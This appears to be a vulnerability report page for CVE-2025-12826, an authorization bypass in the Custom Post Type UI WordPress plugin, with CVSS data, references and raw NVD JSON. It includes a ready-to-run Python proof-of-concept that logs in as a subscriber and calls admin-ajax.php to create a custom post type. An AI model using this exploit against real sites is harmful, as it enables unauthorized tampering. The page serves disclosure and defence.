Security Vulnerability Report
CVE-2025-12826 CVSS 4.8 MEDIUM

CVE-2025-12826

Published: 2025-12-04 07:16:15
Last Modified: 2026-04-15 00:35:42

Description

The Custom Post Type UI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.18.0. This is due to the plugin not verifying that a user has the required capability to perform actions in the "cptui_process_post_type" function. This makes it possible for authenticated attackers, with subscriber level access and above, to add, edit, or delete custom post types in limited situations.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Custom Post Type UI WordPress plugin <= 1.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12826 PoC - Custom Post Type UI Authorization Bypass
# Affected: Custom Post Type UI <= 1.18.0
# Vulnerability: Missing capability check in cptui_process_post_type function
import requests
import sys

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "password"

# Step 1: Authenticate to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
}
response = session.post(login_url, data=login_data, allow_redirects=True)
if "wordpress_logged_in" not in str(session.cookies) and "wordpress_sec_" not in str(session.cookies):
    print("[-] Login failed")
    sys.exit(1)
print("[+] Logged in successfully as subscriber")

# Step 2: Exploit the authorization bypass via admin-ajax.php
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Payload to create a malicious custom post type
exploit_data = {
    "action": "cptui_process_post_type",
    "cpt_custom_post_type": "malicious_type",
    "cpt[post_type]": "malicious_type",
    "cpt[label]": "Malicious Type",
    "cpt[labels][name]": "Malicious Types",
    "cpt[labels][singular_name]": "Malicious Type",
    "cpt[description]": "Created via CVE-2025-12826 exploit",
    "cpt[public]": "true",
    "cpt[show_ui]": "true",
    "cpt[show_in_menu]": "true",
    "cpt[has_archive]": "true",
    "cpt[delete]": "false",
}

print("[*] Sending exploit payload to create custom post type...")
response = session.post(ajax_url, data=exploit_data)
if response.status_code == 200:
    print("[+] Exploit sent successfully")
    print(f"[*] Response: {response.text[:200]}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

# Verification: query the REST API types endpoint to see whether the post type now exists
rest_url = f"{target_url}/wp-json/wp/v2/"
print("[*] Checking if custom post type was created...")
check_response = session.get(f"{rest_url}types")
print(f"[*] Available post types: {check_response.text[:500]}")
```

References

https://github.com/WebDevStudios/custom-post-type-ui/commit/215779a5ac0c624f0dcf875e87305b4898d5bcf9
https://www.wordfence.com/threat-intel/vulnerabilities/id/90d203b1-9426-4eff-b566-02c8a1c6adfa?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12826",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-04T07:16:14.920",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Custom Post Type UI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.18.0. This is due to the plugin not verifying that a user has the required capability to perform actions in the \"cptui_process_post_type\" function. This makes it possible for authenticated attackers, with subscriber level access and above, to add, edit, or delete custom post types in limited situations."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WebDevStudios/custom-post-type-ui/commit/215779a5ac0c624f0dcf875e87305b4898d5bcf9",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/90d203b1-9426-4eff-b566-02c8a1c6adfa?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```